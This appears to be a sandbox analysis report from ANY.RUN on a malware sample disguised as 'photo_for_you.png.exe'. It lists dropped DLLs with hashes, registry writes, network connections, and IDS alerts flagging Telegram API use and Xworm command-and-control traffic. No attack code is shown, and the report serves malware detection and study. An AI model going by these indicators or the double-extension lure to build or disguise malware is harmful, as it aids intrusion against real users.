(PID) Process:(1760) AddInProcess32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(1760) AddInProcess32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
Executable files
148
Suspicious files
614
Text files
1 352
Unknown types
0

Dropped files

PID
Process
Filename
Type
5864photo_for_you.png.exeC:\winnit\wellknows.dll
MD5:
SHA256:
5864photo_for_you.png.exeC:\winnit\msvcp140_atomic_wait.dllexecutable
MD5:21F3417BBD33CBB9F1886E86C7240D1A
SHA256:7E02EFE075B7DD385992F621FDE34728EF7C2D4CF090B127B093D0835345F8FE
5864photo_for_you.png.exeC:\winnit\msvcp140_2.dllexecutable
MD5:E7A91F7C9D91F0F7857632436B121781
SHA256:63F1A20CB17EC5E0CA4EBEA870B68740F24E063E28B235C3C8B58A3D8F57A9C4
5864photo_for_you.png.exeC:\winnit\Qt5Core.dllexecutable
MD5:817520432A42EFA345B2D97F5C24510E
SHA256:8D2FF4CE9096DDCCC4F4CD62C2E41FC854CFD1B0D6E8D296645A7F5FD4AE565A
5864photo_for_you.png.exeC:\winnit\msvcp140_codecvt_ids.dllexecutable
MD5:A3D300560D9C554790B3E6EA50E33D0F
SHA256:3BD90DB2F147899C65FE279F3E44AC48F5598CD0C23A09C0410BE072A4C96070
5864photo_for_you.png.exeC:\winnit\msvcp140_1.dllexecutable
MD5:69D96E09A54FBC5CF92A0E084AB33856
SHA256:A3A1199DE32BBBC8318EC33E2E1CE556247D012851E4B367FE853A51E74CE4EE
5864photo_for_you.png.exeC:\winnit\Qt5Help.dllexecutable
MD5:6FAAB9F54169B33F970A2CE0AE8EAD06
SHA256:E976997B615403842437E46053412FE571377443631D7BEC99FF5C2C7E00A5CC
5864photo_for_you.png.exeC:\winnit\vcruntime140.dllexecutable
MD5:49C96CECDA5C6C660A107D378FDFC3D4
SHA256:69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
5864photo_for_you.png.exeC:\winnit\vcomp140.dllexecutable
MD5:1017BC2C5F48FEDA26358F9AA53508A0
SHA256:2B35B1082B95244A34EFDFACF2AC6F252B7FC5189671715963FA685507E2FF2F
5864photo_for_you.png.exeC:\winnit\pw\DLLs\libffi-7.dllexecutable
MD5:BC20614744EBF4C2B8ACD28D1FE54174
SHA256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
21
TCP/UDP connections
61
DNS requests
23
Threats
178

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.55.161.164:80
http://www.msftconnecttest.com/connecttest.txt
unknown
whitelisted
GET
304
2.22.50.144:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?bf94764fdca12cd4
unknown
whitelisted
5524
MoUsoCoreWorker.exe
GET
304
84.201.210.23:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3a9451325fa8ce7f
unknown
whitelisted
HEAD
200
23.213.164.137:443
https://fs.microsoft.com/fs/windows/config.json
unknown
2860
svchost.exe
GET
304
199.232.210.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?0811ccc60b3de69d
unknown
whitelisted
2860
svchost.exe
GET
200
199.232.210.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?ec9bfb4646951b3a
unknown
whitelisted
2860
svchost.exe
GET
200
199.232.210.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?c8be12605aaef0f9
unknown
whitelisted
2860
svchost.exe
GET
304
199.232.210.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?838da79f34b29c7d
unknown
whitelisted
POST
200
40.126.32.74:443
https://login.live.com/RST2.srf
unknown
xml
1.87 Kb
whitelisted
POST
200
20.190.159.0:443
https://login.live.com/RST2.srf
unknown
xml
11.1 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5552
svchost.exe
239.255.255.250:1900
whitelisted
52.109.28.46:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
34.120.208.123:443
incoming.telemetry.mozilla.org
GOOGLE-CLOUD-PLATFORM
US
whitelisted
34.149.100.209:443
firefox.settings.services.mozilla.com
GOOGLE
US
whitelisted
52.113.194.132:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
52.109.89.117:443
mrodevicemgr.officeapps.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
23.55.161.164:80
Akamai International B.V.
DE
unknown
2.22.50.144:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
officeclient.microsoft.com
  • 52.109.28.46
whitelisted
firefox.settings.services.mozilla.com
  • 34.149.100.209
whitelisted
incoming.telemetry.mozilla.org
  • 34.120.208.123
whitelisted
prod.remote-settings.prod.webservices.mozgcp.net
  • 34.149.100.209
whitelisted
telemetry-incoming.r53-2.services.mozilla.com
  • 34.120.208.123
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted
mrodevicemgr.officeapps.live.com
  • 52.109.89.117
whitelisted
google.com
  • 142.250.185.206
whitelisted
ctldl.windowsupdate.com
  • 2.22.50.144
  • 2.22.50.131
  • 84.201.210.23
  • 84.201.210.20
  • 84.201.210.19
  • 84.201.210.18
  • 217.20.57.23
  • 217.20.57.21
  • 217.20.57.25
  • 199.232.210.172
  • 199.232.214.172
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted

Threats

PID
Process
Class
Message
Misc activity
ET INFO Microsoft Connection Test
1656
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
1760
AddInProcess32.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
1760
AddInProcess32.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
1760
AddInProcess32.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm TCP Packet
173 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
photo_for_you.png.exe